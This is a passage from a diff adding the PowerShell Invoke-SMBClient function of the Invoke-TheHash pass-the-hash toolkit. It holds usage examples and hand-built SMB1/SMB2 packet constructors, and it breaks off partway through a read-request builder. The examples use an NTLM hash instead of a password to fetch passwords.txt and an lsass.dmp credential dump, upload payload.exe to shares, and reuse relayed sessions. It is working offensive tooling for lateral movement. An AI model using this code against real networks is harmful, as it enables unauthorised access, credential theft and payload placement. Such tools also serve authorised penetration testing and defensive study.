+Delete a file on a share.
+Invoke-SMBClient -Domain TESTDOMAIN -Username TEST -Hash F6F38B793DB6A94BA04A52F1D3EE92F0 -Action Delete -Source \\server\share\payload.exe
+
+.EXAMPLE
+Delete a file in subdirectories within a share.
+Invoke-SMBClient -Domain TESTDOMAIN -Username TEST -Hash F6F38B793DB6A94BA04A52F1D3EE92F0 -Action Delete -Source \\server\share\subdirectory\subdirectory\payload.exe
+
+.EXAMPLE
+Download a file from a share.
+Invoke-SMBClient -Domain TESTDOMAIN -Username TEST -Hash F6F38B793DB6A94BA04A52F1D3EE92F0 -Action Get -Source \\server\share\passwords.txt
+
+.EXAMPLE
+Download a file from within a share subdirectory and set a new filename.
+Invoke-SMBClient -Domain TESTDOMAIN -Username TEST -Hash F6F38B793DB6A94BA04A52F1D3EE92F0 -Action Get -Source \\server\share\subdirectory\lsass.dmp -Destination server_lsass.dmp
+
+.EXAMPLE
+Download a file from a share to a byte array variable instead of disk.
+[Byte[]]$password_file = Invoke-SMBClient -Domain TESTDOMAIN -Username TEST -Hash F6F38B793DB6A94BA04A52F1D3EE92F0 -Action Get -Source \\server\share\passwords.txt -Modify
+[System.Text.Encoding]::UTF8.GetString($password_file)
+
+.EXAMPLE
+Upload a file to a share subdirectory.
+Invoke-SMBClient -Domain TESTDOMAIN -Username TEST -Hash F6F38B793DB6A94BA04A52F1D3EE92F0 -Action Put -Source payload.exe -Destination \\server\share\subdirectory\payload.exe
+
+.EXAMPLE
+Upload a file to share from a byte array variable.
+Invoke-SMBClient -Domain TESTDOMAIN -Username TEST -Hash F6F38B793DB6A94BA04A52F1D3EE92F0 -Action Put -Source $file_byte_array -Destination \\server\share\file.docx -Modify
+
+.EXAMPLE
+List the contents of a share directory using an authenticated Inveigh-Relay session.
+Invoke-SMBClient -Session 1 -Source \\server\share
+
+.LINK
+https://github.com/Kevin-Robertson/Invoke-TheHash
+
+#>
+[CmdletBinding(DefaultParametersetName='Default')]
+param
+(
+ [parameter(Mandatory=$false)][ValidateSet("List","Recurse","Get","Put","Delete")][String]$Action = "List",
+ [parameter(Mandatory=$false)][String]$Destination,
+ [parameter(ParameterSetName='Default',Mandatory=$true)][String]$Username,
+ [parameter(ParameterSetName='Default',Mandatory=$false)][String]$Domain,
+ [parameter(Mandatory=$true)][Object]$Source,
+ [parameter(ParameterSetName='Default',Mandatory=$true)][ValidateScript({$_.Length -eq 32 -or $_.Length -eq 65})][String]$Hash,
+ [parameter(Mandatory=$false)][Switch]$Modify,
+ [parameter(Mandatory=$false)][Switch]$NoProgress,
+ [parameter(ParameterSetName='Session',Mandatory=$false)][Int]$Session,
+ [parameter(ParameterSetName='Session',Mandatory=$false)][Switch]$Logoff,
+ [parameter(ParameterSetName='Session',Mandatory=$false)][Switch]$Refresh,
+ [parameter(Mandatory=$false)][Int]$Sleep=100
+)
+
+function ConvertFrom-PacketOrderedDictionary
+{
+ param($packet_ordered_dictionary)
+
+ ForEach($field in $packet_ordered_dictionary.Values)
+ {
+ $byte_array += $field
+ }
+
+ return $byte_array
+}
+
+#NetBIOS
+
+function New-PacketNetBIOSSessionService
+{
+ param([Int]$packet_header_length,[Int]$packet_data_length)
+
+ [Byte[]]$packet_netbios_session_service_length = [System.BitConverter]::GetBytes($packet_header_length + $packet_data_length)
+ $packet_NetBIOS_session_service_length = $packet_netbios_session_service_length[2..0]
+
+ $packet_NetBIOSSessionService = New-Object System.Collections.Specialized.OrderedDictionary
+ $packet_NetBIOSSessionService.Add("Message_Type",[Byte[]](0x00))
+ $packet_NetBIOSSessionService.Add("Length",[Byte[]]($packet_netbios_session_service_length))
+
+ return $packet_NetBIOSSessionService
+}
+
+#SMB1
+
+function New-PacketSMBHeader
+{
+ param([Byte[]]$packet_command,[Byte[]]$packet_flags,[Byte[]]$packet_flags2,[Byte[]]$packet_tree_ID,[Byte[]]$packet_process_ID,[Byte[]]$packet_user_ID)
+
+ $packet_SMBHeader = New-Object System.Collections.Specialized.OrderedDictionary
+ $packet_SMBHeader.Add("Protocol",[Byte[]](0xff,0x53,0x4d,0x42))
+ $packet_SMBHeader.Add("Command",$packet_command)
+ $packet_SMBHeader.Add("ErrorClass",[Byte[]](0x00))
+ $packet_SMBHeader.Add("Reserved",[Byte[]](0x00))
+ $packet_SMBHeader.Add("ErrorCode",[Byte[]](0x00,0x00))
+ $packet_SMBHeader.Add("Flags",$packet_flags)
+ $packet_SMBHeader.Add("Flags2",$packet_flags2)
+ $packet_SMBHeader.Add("ProcessIDHigh",[Byte[]](0x00,0x00))
+ $packet_SMBHeader.Add("Signature",[Byte[]](0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00))
+ $packet_SMBHeader.Add("Reserved2",[Byte[]](0x00,0x00))
+ $packet_SMBHeader.Add("TreeID",$packet_tree_ID)
+ $packet_SMBHeader.Add("ProcessID",$packet_process_ID)
+ $packet_SMBHeader.Add("UserID",$packet_user_ID)
+ $packet_SMBHeader.Add("MultiplexID",[Byte[]](0x00,0x00))
+
+ return $packet_SMBHeader
+}
+
+function New-PacketSMBNegotiateProtocolRequest
+{
+ param([String]$packet_version)
+
+ if($packet_version -eq 'SMB1')
+ {
+ [Byte[]]$packet_byte_count = 0x0c,0x00
+ }
+ else
+ {
+ [Byte[]]$packet_byte_count = 0x22,0x00
+ }
+
+ $packet_SMBNegotiateProtocolRequest = New-Object System.Collections.Specialized.OrderedDictionary
+ $packet_SMBNegotiateProtocolRequest.Add("WordCount",[Byte[]](0x00))
+ $packet_SMBNegotiateProtocolRequest.Add("ByteCount",$packet_byte_count)
+ $packet_SMBNegotiateProtocolRequest.Add("RequestedDialects_Dialect_BufferFormat",[Byte[]](0x02))
+ $packet_SMBNegotiateProtocolRequest.Add("RequestedDialects_Dialect_Name",[Byte[]](0x4e,0x54,0x20,0x4c,0x4d,0x20,0x30,0x2e,0x31,0x32,0x00))
+
+ if($packet_version -ne 'SMB1')
+ {
+ $packet_SMBNegotiateProtocolRequest.Add("RequestedDialects_Dialect_BufferFormat2",[Byte[]](0x02))
+ $packet_SMBNegotiateProtocolRequest.Add("RequestedDialects_Dialect_Name2",[Byte[]](0x53,0x4d,0x42,0x20,0x32,0x2e,0x30,0x30,0x32,0x00))
+ $packet_SMBNegotiateProtocolRequest.Add("RequestedDialects_Dialect_BufferFormat3",[Byte[]](0x02))
+ $packet_SMBNegotiateProtocolRequest.Add("RequestedDialects_Dialect_Name3",[Byte[]](0x53,0x4d,0x42,0x20,0x32,0x2e,0x3f,0x3f,0x3f,0x00))
+ }
+
+ return $packet_SMBNegotiateProtocolRequest
+}
+
+#SMB2
+
+function New-PacketSMB2Header
+{
+ param([Byte[]]$packet_command,[Byte[]]$packet_credit_request,[Int]$packet_message_ID,[Byte[]]$packet_tree_ID,[Byte[]]$packet_session_ID)
+
+ [Byte[]]$packet_message_ID = [System.BitConverter]::GetBytes($packet_message_ID) + 0x00,0x00,0x00,0x00
+
+ $packet_SMB2Header = New-Object System.Collections.Specialized.OrderedDictionary
+ $packet_SMB2Header.Add("ProtocolID",[Byte[]](0xfe,0x53,0x4d,0x42))
+ $packet_SMB2Header.Add("StructureSize",[Byte[]](0x40,0x00))
+ $packet_SMB2Header.Add("CreditCharge",[Byte[]](0x01,0x00))
+ $packet_SMB2Header.Add("ChannelSequence",[Byte[]](0x00,0x00))
+ $packet_SMB2Header.Add("Reserved",[Byte[]](0x00,0x00))
+ $packet_SMB2Header.Add("Command",$packet_command)
+ $packet_SMB2Header.Add("CreditRequest",$packet_credit_request)
+ $packet_SMB2Header.Add("Flags",[Byte[]](0x00,0x00,0x00,0x00))
+ $packet_SMB2Header.Add("NextCommand",[Byte[]](0x00,0x00,0x00,0x00))
+ $packet_SMB2Header.Add("MessageID",$packet_message_ID)
+ $packet_SMB2Header.Add("ProcessID",[Byte[]](0x00,0x00,0x00,0x00))
+ $packet_SMB2Header.Add("TreeID",$packet_tree_ID)
+ $packet_SMB2Header.Add("SessionID",$packet_session_ID)
+ $packet_SMB2Header.Add("Signature",[Byte[]](0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00))
+
+ return $packet_SMB2Header
+}
+
+function New-PacketSMB2NegotiateProtocolRequest
+{
+ $packet_SMB2NegotiateProtocolRequest = New-Object System.Collections.Specialized.OrderedDictionary
+ $packet_SMB2NegotiateProtocolRequest.Add("StructureSize",[Byte[]](0x24,0x00))
+ $packet_SMB2NegotiateProtocolRequest.Add("DialectCount",[Byte[]](0x02,0x00))
+ $packet_SMB2NegotiateProtocolRequest.Add("SecurityMode",[Byte[]](0x01,0x00))
+ $packet_SMB2NegotiateProtocolRequest.Add("Reserved",[Byte[]](0x00,0x00))
+ $packet_SMB2NegotiateProtocolRequest.Add("Capabilities",[Byte[]](0x40,0x00,0x00,0x00))
+ $packet_SMB2NegotiateProtocolRequest.Add("ClientGUID",[Byte[]](0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00))
+ $packet_SMB2NegotiateProtocolRequest.Add("NegotiateContextOffset",[Byte[]](0x00,0x00,0x00,0x00))
+ $packet_SMB2NegotiateProtocolRequest.Add("NegotiateContextCount",[Byte[]](0x00,0x00))
+ $packet_SMB2NegotiateProtocolRequest.Add("Reserved2",[Byte[]](0x00,0x00))
+ $packet_SMB2NegotiateProtocolRequest.Add("Dialect",[Byte[]](0x02,0x02))
+ $packet_SMB2NegotiateProtocolRequest.Add("Dialect2",[Byte[]](0x10,0x02))
+
+ return $packet_SMB2NegotiateProtocolRequest
+}
+
+function New-PacketSMB2SessionSetupRequest
+{
+ param([Byte[]]$packet_security_blob)
+
+ [Byte[]]$packet_security_blob_length = [System.BitConverter]::GetBytes($packet_security_blob.Length)
+ $packet_security_blob_length = $packet_security_blob_length[0,1]
+
+ $packet_SMB2SessionSetupRequest = New-Object System.Collections.Specialized.OrderedDictionary
+ $packet_SMB2SessionSetupRequest.Add("StructureSize",[Byte[]](0x19,0x00))
+ $packet_SMB2SessionSetupRequest.Add("Flags",[Byte[]](0x00))
+ $packet_SMB2SessionSetupRequest.Add("SecurityMode",[Byte[]](0x01))
+ $packet_SMB2SessionSetupRequest.Add("Capabilities",[Byte[]](0x00,0x00,0x00,0x00))
+ $packet_SMB2SessionSetupRequest.Add("Channel",[Byte[]](0x00,0x00,0x00,0x00))
+ $packet_SMB2SessionSetupRequest.Add("SecurityBufferOffset",[Byte[]](0x58,0x00))
+ $packet_SMB2SessionSetupRequest.Add("SecurityBufferLength",$packet_security_blob_length)
+ $packet_SMB2SessionSetupRequest.Add("PreviousSessionID",[Byte[]](0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00))
+ $packet_SMB2SessionSetupRequest.Add("Buffer",$packet_security_blob)
+
+ return $packet_SMB2SessionSetupRequest
+}
+
+function New-PacketSMB2TreeConnectRequest
+{
+ param([Byte[]]$packet_path)
+
+ [Byte[]]$packet_path_length = [System.BitConverter]::GetBytes($packet_path.Length)
+ $packet_path_length = $packet_path_length[0,1]
+
+ $packet_SMB2TreeConnectRequest = New-Object System.Collections.Specialized.OrderedDictionary
+ $packet_SMB2TreeConnectRequest.Add("StructureSize",[Byte[]](0x09,0x00))
+ $packet_SMB2TreeConnectRequest.Add("Reserved",[Byte[]](0x00,0x00))
+ $packet_SMB2TreeConnectRequest.Add("PathOffset",[Byte[]](0x48,0x00))
+ $packet_SMB2TreeConnectRequest.Add("PathLength",$packet_path_length)
+ $packet_SMB2TreeConnectRequest.Add("Buffer",$packet_path)
+
+ return $packet_SMB2TreeConnectRequest
+}
+
+function New-PacketSMB2IoctlRequest
+{
+ param([Byte[]]$packet_file_name)
+
+ $packet_file_name_length = [System.BitConverter]::GetBytes($packet_file_name.Length + 2)
+
+ $packet_SMB2IoctlRequest = New-Object System.Collections.Specialized.OrderedDictionary
+ $packet_SMB2IoctlRequest.Add("StructureSize",[Byte[]](0x39,0x00))
+ $packet_SMB2IoctlRequest.Add("Reserved",[Byte[]](0x00,0x00))
+ $packet_SMB2IoctlRequest.Add("Function",[Byte[]](0x94,0x01,0x06,0x00))
+ $packet_SMB2IoctlRequest.Add("GUIDHandle",[Byte[]](0xff,0xff,0xff,0xff,0xff,0xff,0xff,0xff,0xff,0xff,0xff,0xff,0xff,0xff,0xff,0xff))
+ $packet_SMB2IoctlRequest.Add("InData_Offset",[Byte[]](0x78,0x00,0x00,0x00))
+ $packet_SMB2IoctlRequest.Add("InData_Length",$packet_file_name_length)
+ $packet_SMB2IoctlRequest.Add("MaxIoctlInSize",[Byte[]](0x00,0x00,0x00,0x00))
+ $packet_SMB2IoctlRequest.Add("OutData_Offset",[Byte[]](0x78,0x00,0x00,0x00))
+ $packet_SMB2IoctlRequest.Add("OutData_Length",[Byte[]](0x00,0x00,0x00,0x00))
+ $packet_SMB2IoctlRequest.Add("MaxIoctlOutSize",[Byte[]](0x00,0x10,0x00,0x00))
+ $packet_SMB2IoctlRequest.Add("Flags",[Byte[]](0x01,0x00,0x00,0x00))
+ $packet_SMB2IoctlRequest.Add("Unknown",[Byte[]](0x00,0x00,0x00,0x00))
+ $packet_SMB2IoctlRequest.Add("InData_MaxReferralLevel",[Byte[]](0x04,0x00))
+ $packet_SMB2IoctlRequest.Add("InData_FileName",$packet_file_name)
+
+ return $packet_SMB2IoctlRequest
+}
+
+function New-PacketRAPNetShareEnum
+{
+ param([String]$packet_server_UNC)
+
+ $packet_RAPNetShareEnum = New-Object System.Collections.Specialized.OrderedDictionary
+ $packet_RAPNetShareEnum.Add("PointerToServerUNC_ReferentID",[Byte[]](0x00,0x00,0x02,0x00))
+ $packet_RAPNetShareEnum.Add("PointerToServerUNC_MaxCount",$packet_MaxCount)
+ $packet_RAPNetShareEnum.Add("PointerToServerUNC_Offset",[Byte[]](0x00,0x00,0x00,0x00))
+ $packet_RAPNetShareEnum.Add("PointerToServerUNC_ActualCount",$packet_MaxCount)
+ $packet_RAPNetShareEnum.Add("PointerToServerUNC_MaxCount",$packet_server_UNC)
+ $packet_RAPNetShareEnum.Add("PointerToLevel_Level",[Byte[]](0x01,0x00,0x02,0x00))
+ $packet_RAPNetShareEnum.Add("PointerToCtr_NetShareCtr_Ctr",[Byte[]](0x01,0x00,0x02,0x00))
+ $packet_RAPNetShareEnum.Add("PointerToCtr_NetShareCtr_Pointer_ReferentID",[Byte[]](0x04,0x00,0x02,0x00))
+ $packet_RAPNetShareEnum.Add("PointerToCtr_NetShareCtr_Pointer_Ctr1_Count",[Byte[]](0x00,0x00,0x00,0x00))
+ $packet_RAPNetShareEnum.Add("PointerToCtr_NetShareCtr_Pointer_NullPointer",[Byte[]](0x00,0x00,0x00,0x00))
+ $packet_RAPNetShareEnum.Add("MaxBuffer",[Byte[]](0xff,0xff,0xff,0xff))
+ $packet_RAPNetShareEnum.Add("NullPointer",[Byte[]](0x00,0x00,0x00,0x00))
+
+ return $packet_RAPNetShareEnum
+}
+
+function New-PacketSMB2CreateRequest
+{
+ param([Byte[]]$packet_file_name,[Int]$packet_extra_info,[Int64]$packet_allocation_size)
+
+ if($packet_file_name)
+ {
+ $packet_file_name_length = [System.BitConverter]::GetBytes($packet_file_name.Length)
+ $packet_file_name_length = $packet_file_name_length[0,1]
+ }
+ else
+ {
+ $packet_file_name = 0x00,0x00,0x69,0x00,0x6e,0x00,0x64,0x00
+ $packet_file_name_length = 0x00,0x00
+ }
+
+ if($packet_extra_info)
+ {
+ [Byte[]]$packet_desired_access = 0x80,0x00,0x10,0x00
+ [Byte[]]$packet_file_attributes = 0x00,0x00,0x00,0x00
+ [Byte[]]$packet_share_access = 0x00,0x00,0x00,0x00
+ [Byte[]]$packet_create_options = 0x21,0x00,0x00,0x00
+ [Byte[]]$packet_create_contexts_offset = [System.BitConverter]::GetBytes($packet_file_name.Length)
+
+ if($packet_extra_info -eq 1)
+ {
+ [Byte[]]$packet_create_contexts_length = 0x58,0x00,0x00,0x00
+ }
+ elseif($packet_extra_info -eq 2)
+ {
+ [Byte[]]$packet_create_contexts_length = 0x90,0x00,0x00,0x00
+ }
+ else
+ {
+ [Byte[]]$packet_create_contexts_length = 0xb0,0x00,0x00,0x00
+ [Byte[]]$packet_allocation_size_bytes = [System.BitConverter]::GetBytes($packet_allocation_size)
+ }
+
+ if($packet_file_name)
+ {
+
+ [String]$packet_file_name_padding_check = $packet_file_name.Length / 8
+
+ if($packet_file_name_padding_check -like "*.75")
+ {
+ $packet_file_name += 0x04,0x00
+ }
+ elseif($packet_file_name_padding_check -like "*.5")
+ {
+ $packet_file_name += 0x00,0x00,0x00,0x00
+ }
+ elseif($packet_file_name_padding_check -like "*.25")
+ {
+ $packet_file_name += 0x00,0x00,0x00,0x00,0x00,0x00
+ }
+
+ }
+
+ [Byte[]]$packet_create_contexts_offset = [System.BitConverter]::GetBytes($packet_file_name.Length + 120)
+
+ }
+ else
+ {
+ [Byte[]]$packet_desired_access = 0x03,0x00,0x00,0x00
+ [Byte[]]$packet_file_attributes = 0x80,0x00,0x00,0x00
+ [Byte[]]$packet_share_access = 0x01,0x00,0x00,0x00
+ [Byte[]]$packet_create_options = 0x40,0x00,0x00,0x00
+ [Byte[]]$packet_create_contexts_offset = 0x00,0x00,0x00,0x00
+ [Byte[]]$packet_create_contexts_length = 0x00,0x00,0x00,0x00
+ }
+
+ $packet_SMB2CreateRequest = New-Object System.Collections.Specialized.OrderedDictionary
+ $packet_SMB2CreateRequest.Add("StructureSize",[Byte[]](0x39,0x00))
+ $packet_SMB2CreateRequest.Add("Flags",[Byte[]](0x00))
+ $packet_SMB2CreateRequest.Add("RequestedOplockLevel",[Byte[]](0x00))
+ $packet_SMB2CreateRequest.Add("Impersonation",[Byte[]](0x02,0x00,0x00,0x00))
+ $packet_SMB2CreateRequest.Add("SMBCreateFlags",[Byte[]](0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00))
+ $packet_SMB2CreateRequest.Add("Reserved",[Byte[]](0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00))
+ $packet_SMB2CreateRequest.Add("DesiredAccess",$packet_desired_access)
+ $packet_SMB2CreateRequest.Add("FileAttributes",$packet_file_attributes)
+ $packet_SMB2CreateRequest.Add("ShareAccess",$packet_share_access)
+ $packet_SMB2CreateRequest.Add("CreateDisposition",[Byte[]](0x01,0x00,0x00,0x00))
+ $packet_SMB2CreateRequest.Add("CreateOptions",$packet_create_options)
+ $packet_SMB2CreateRequest.Add("NameOffset",[Byte[]](0x78,0x00))
+ $packet_SMB2CreateRequest.Add("NameLength",$packet_file_name_length)
+ $packet_SMB2CreateRequest.Add("CreateContextsOffset",$packet_create_contexts_offset)
+ $packet_SMB2CreateRequest.Add("CreateContextsLength",$packet_create_contexts_length)
+ $packet_SMB2CreateRequest.Add("Buffer",$packet_file_name)
+
+ if($packet_extra_info)
+ {
+ $packet_SMB2CreateRequest.Add("ExtraInfo_ChainElementDHnQ_ChainOffset",[Byte[]](0x28,0x00,0x00,0x00))
+ $packet_SMB2CreateRequest.Add("ExtraInfo_ChainElementDHnQ_Tag_Offset",[Byte[]](0x10,0x00))
+ $packet_SMB2CreateRequest.Add("ExtraInfo_ChainElementDHnQ_Tag_Length",[Byte[]](0x04,0x00,0x00,0x00))
+ $packet_SMB2CreateRequest.Add("ExtraInfo_ChainElementDHnQ_Data_Offset",[Byte[]](0x18,0x00))
+ $packet_SMB2CreateRequest.Add("ExtraInfo_ChainElementDHnQ_Data_Length",[Byte[]](0x10,0x00,0x00,0x00))
+ $packet_SMB2CreateRequest.Add("ExtraInfo_ChainElementDHnQ_Tag",[Byte[]](0x44,0x48,0x6e,0x51))
+ $packet_SMB2CreateRequest.Add("ExtraInfo_ChainElementDHnQ_Unknown",[Byte[]](0x00,0x00,0x00,0x00))
+ $packet_SMB2CreateRequest.Add("ExtraInfo_ChainElementDHnQ_Data_GUIDHandle",[Byte[]](0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00))
+
+ if($packet_extra_info -eq 3)
+ {
+ $packet_SMB2CreateRequest.Add("ExtraInfo_ChainElementAlSi_ChainOffset",[Byte[]](0x20,0x00,0x00,0x00))
+ $packet_SMB2CreateRequest.Add("ExtraInfo_ChainElementAlSi_Tag_Offset",[Byte[]](0x10,0x00))
+ $packet_SMB2CreateRequest.Add("ExtraInfo_ChainElementAlSi_Tag_Length",[Byte[]](0x04,0x00,0x00,0x00))
+ $packet_SMB2CreateRequest.Add("ExtraInfo_ChainElementAlSi_Data_Offset",[Byte[]](0x18,0x00))
+ $packet_SMB2CreateRequest.Add("ExtraInfo_ChainElementAlSi_Data_Length",[Byte[]](0x08,0x00,0x00,0x00))
+ $packet_SMB2CreateRequest.Add("ExtraInfo_ChainElementAlSi_Tag",[Byte[]](0x41,0x6c,0x53,0x69))
+ $packet_SMB2CreateRequest.Add("ExtraInfo_ChainElementAlSi_Unknown",[Byte[]](0x00,0x00,0x00,0x00))
+ $packet_SMB2CreateRequest.Add("ExtraInfo_ChainElementAlSi_AllocationSize",$packet_allocation_size_bytes)
+ }
+
+ $packet_SMB2CreateRequest.Add("ExtraInfo_ChainElementMxAc_ChainOffset",[Byte[]](0x18,0x00,0x00,0x00))
+ $packet_SMB2CreateRequest.Add("ExtraInfo_ChainElementMxAc_Tag_Offset",[Byte[]](0x10,0x00))
+ $packet_SMB2CreateRequest.Add("ExtraInfo_ChainElementMxAc_Tag_Length",[Byte[]](0x04,0x00,0x00,0x00))
+ $packet_SMB2CreateRequest.Add("ExtraInfo_ChainElementMxAc_Data_Offset",[Byte[]](0x18,0x00))
+ $packet_SMB2CreateRequest.Add("ExtraInfo_ChainElementMxAc_Data_Length",[Byte[]](0x00,0x00,0x00,0x00))
+ $packet_SMB2CreateRequest.Add("ExtraInfo_ChainElementMxAc_Tag",[Byte[]](0x4d,0x78,0x41,0x63))
+ $packet_SMB2CreateRequest.Add("ExtraInfo_ChainElementMxAc_Unknown",[Byte[]](0x00,0x00,0x00,0x00))
+
+ if($packet_extra_info -gt 1)
+ {
+ $packet_SMB2CreateRequest.Add("ExtraInfo_ChainElementQFid_ChainOffset",[Byte[]](0x18,0x00,0x00,0x00))
+ }
+ else
+ {
+ $packet_SMB2CreateRequest.Add("ExtraInfo_ChainElementQFid_ChainOffset",[Byte[]](0x00,0x00,0x00,0x00))
+ }
+
+ $packet_SMB2CreateRequest.Add("ExtraInfo_ChainElementQFid_Tag_Offset",[Byte[]](0x10,0x00))
+ $packet_SMB2CreateRequest.Add("ExtraInfo_ChainElementQFid_Tag_Length",[Byte[]](0x04,0x00,0x00,0x00))
+ $packet_SMB2CreateRequest.Add("ExtraInfo_ChainElementQFid_Data_Offset",[Byte[]](0x18,0x00))
+ $packet_SMB2CreateRequest.Add("ExtraInfo_ChainElementQFid_Data_Length",[Byte[]](0x00,0x00,0x00,0x00))
+ $packet_SMB2CreateRequest.Add("ExtraInfo_ChainElementQFid_Tag",[Byte[]](0x51,0x46,0x69,0x64))
+ $packet_SMB2CreateRequest.Add("ExtraInfo_ChainElementQFid_Unknown",[Byte[]](0x00,0x00,0x00,0x00))
+
+ if($packet_extra_info -gt 1)
+ {
+ $packet_SMB2CreateRequest.Add("ExtraInfo_ChainElementRqLs_ChainOffset",[Byte[]](0x00,0x00,0x00,0x00))
+ $packet_SMB2CreateRequest.Add("ExtraInfo_ChainElementRqLs_Tag_Offset",[Byte[]](0x10,0x00))
+ $packet_SMB2CreateRequest.Add("ExtraInfo_ChainElementRqLs_Tag_Length",[Byte[]](0x04,0x00,0x00,0x00))
+ $packet_SMB2CreateRequest.Add("ExtraInfo_ChainElementRqLs_Data_Offset",[Byte[]](0x18,0x00))
+ $packet_SMB2CreateRequest.Add("ExtraInfo_ChainElementRqLs_Data_Length",[Byte[]](0x20,0x00,0x00,0x00))
+ $packet_SMB2CreateRequest.Add("ExtraInfo_ChainElementRqLs_Tag",[Byte[]](0x52,0x71,0x4c,0x73))
+ $packet_SMB2CreateRequest.Add("ExtraInfo_ChainElementRqLs_Unknown",[Byte[]](0x00,0x00,0x00,0x00))
+
+ if($packet_extra_info -eq 2)
+ {
+ $packet_SMB2CreateRequest.Add("ExtraInfo_ChainElementRqLs_Data_Lease_Key",[Byte[]](0x10,0xb0,0x1d,0x02,0xa0,0xf8,0xff,0xff,0x47,0x78,0x67,0x02,0x00,0x00,0x00,0x00))
+ }
+ else
+ {
+ $packet_SMB2CreateRequest.Add("ExtraInfo_ChainElementRqLs_Data_Lease_Key",[Byte[]](0x10,0x90,0x64,0x01,0xa0,0xf8,0xff,0xff,0x47,0x78,0x67,0x02,0x00,0x00,0x00,0x00))
+ }
+
+ $packet_SMB2CreateRequest.Add("ExtraInfo_ChainElementRqLs_Data_Lease_State",[Byte[]](0x07,0x00,0x00,0x00))
+ $packet_SMB2CreateRequest.Add("ExtraInfo_ChainElementRqLs_Data_Lease_Flags",[Byte[]](0x00,0x00,0x00,0x00))
+ $packet_SMB2CreateRequest.Add("ExtraInfo_ChainElementRqLs_Data_Lease_Duration",[Byte[]](0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00))
+ }
+
+ }
+
+ return $packet_SMB2CreateRequest
+}
+
+function New-PacketSMB2FindRequestFile
+{
+ param ([Byte[]]$packet_file_ID,[Byte[]]$packet_padding)
+
+ $packet_SMB2FindRequestFile = New-Object System.Collections.Specialized.OrderedDictionary
+ $packet_SMB2FindRequestFile.Add("StructureSize",[Byte[]](0x21,0x00))
+ $packet_SMB2FindRequestFile.Add("InfoLevel",[Byte[]](0x25))
+ $packet_SMB2FindRequestFile.Add("Flags",[Byte[]](0x00))
+ $packet_SMB2FindRequestFile.Add("FileIndex",[Byte[]](0x00,0x00,0x00,0x00))
+ $packet_SMB2FindRequestFile.Add("FileID",$packet_file_ID)
+ $packet_SMB2FindRequestFile.Add("SearchPattern_Offset",[Byte[]](0x60,0x00))
+ $packet_SMB2FindRequestFile.Add("SearchPattern_Length",[Byte[]](0x02,0x00))
+ $packet_SMB2FindRequestFile.Add("OutputBufferLength",[Byte[]](0x00,0x00,0x01,0x00))
+ $packet_SMB2FindRequestFile.Add("SearchPattern",[Byte[]](0x2a,0x00))
+
+ if($packet_padding)
+ {
+ $packet_SMB2FindRequestFile.Add("Padding",$packet_padding)
+ }
+
+ return $packet_SMB2FindRequestFile
+}
+
+function New-PacketSMB2QueryInfoRequest
+{
+ param ([Byte[]]$packet_info_type,[Byte[]]$packet_file_info_class,[Byte[]]$packet_output_buffer_length,[Byte[]]$packet_input_buffer_offset,[Byte[]]$packet_file_ID,[Int]$packet_buffer)
+
+ [Byte[]]$packet_buffer_bytes = ,0x00 * $packet_buffer
+
+ $packet_SMB2QueryInfoRequest = New-Object System.Collections.Specialized.OrderedDictionary
+ $packet_SMB2QueryInfoRequest.Add("StructureSize",[Byte[]](0x29,0x00))
+ $packet_SMB2QueryInfoRequest.Add("InfoType",$packet_info_type)
+ $packet_SMB2QueryInfoRequest.Add("FileInfoClass",$packet_file_info_class)
+ $packet_SMB2QueryInfoRequest.Add("OutputBufferLength",$packet_output_buffer_length)
+ $packet_SMB2QueryInfoRequest.Add("InputBufferOffset",$packet_input_buffer_offset)
+ $packet_SMB2QueryInfoRequest.Add("Reserved",[Byte[]](0x00,0x00))
+ $packet_SMB2QueryInfoRequest.Add("InputBufferLength",[Byte[]](0x00,0x00,0x00,0x00))
+ $packet_SMB2QueryInfoRequest.Add("AdditionalInformation",[Byte[]](0x00,0x00,0x00,0x00))
+ $packet_SMB2QueryInfoRequest.Add("Flags",[Byte[]](0x00,0x00,0x00,0x00))
+ $packet_SMB2QueryInfoRequest.Add("FileID",$packet_file_ID)
+
+ if($packet_buffer -gt 0)
+ {
+ $packet_SMB2QueryInfoRequest.Add("Buffer",$packet_buffer_bytes)
+ }
+
+ return $packet_SMB2QueryInfoRequest
+}
+
+function New-PacketSMB2SetInfoRequest
+{
+ param ([Byte[]]$packet_info_type,[Byte[]]$packet_file_info_class,[Byte[]]$packet_file_ID,[Byte[]]$packet_buffer)
+
+ [Byte[]]$packet_buffer_length = [System.BitConverter]::GetBytes($packet_buffer.Count)
+
+ $packet_SMB2SetInfoRequest = New-Object System.Collections.Specialized.OrderedDictionary
+ $packet_SMB2SetInfoRequest.Add("StructureSize",[Byte[]](0x21,0x00))
+ $packet_SMB2SetInfoRequest.Add("InfoType",$packet_info_type)
+ $packet_SMB2SetInfoRequest.Add("FileInfoClass",$packet_file_info_class)
+ $packet_SMB2SetInfoRequest.Add("BufferLength",$packet_buffer_length)
+ $packet_SMB2SetInfoRequest.Add("BufferOffset",[Byte[]](0x60,0x00))
+ $packet_SMB2SetInfoRequest.Add("Reserved",[Byte[]](0x00,0x00))
+ $packet_SMB2SetInfoRequest.Add("AdditionalInformation",[Byte[]](0x00,0x00,0x00,0x00))
+ $packet_SMB2SetInfoRequest.Add("FileID",$packet_file_ID)
+ $packet_SMB2SetInfoRequest.Add("Buffer",$packet_buffer)
+
+ return $packet_SMB2SetInfoRequest
+}
+
+function New-PacketSMB2ReadRequest
+{
+ param ([Int]$packet_length,[Int64]$packet_offset,[Byte[]]$packet_file_ID)
+
+ [Byte[]]$packet_length_bytes = [System.BitConverter]::GetBytes($packet_length)
+ [Byte[]]$packet_offset_bytes = [System.BitConverter]::GetBytes($packet_offset)
+
+ $packet_SMB2ReadRequest = New-Object System.Collections.Specialized.OrderedDictionary
+ $packet_SMB2ReadRequest.Add("StructureSize",[Byte[]](0x31,0x00))
+ $packet_SMB2ReadRequest.Add("Padding",[Byte[]](0x50))
+ $packet_SMB2ReadRequest.Add("Flags",[Byte[]](0x00))
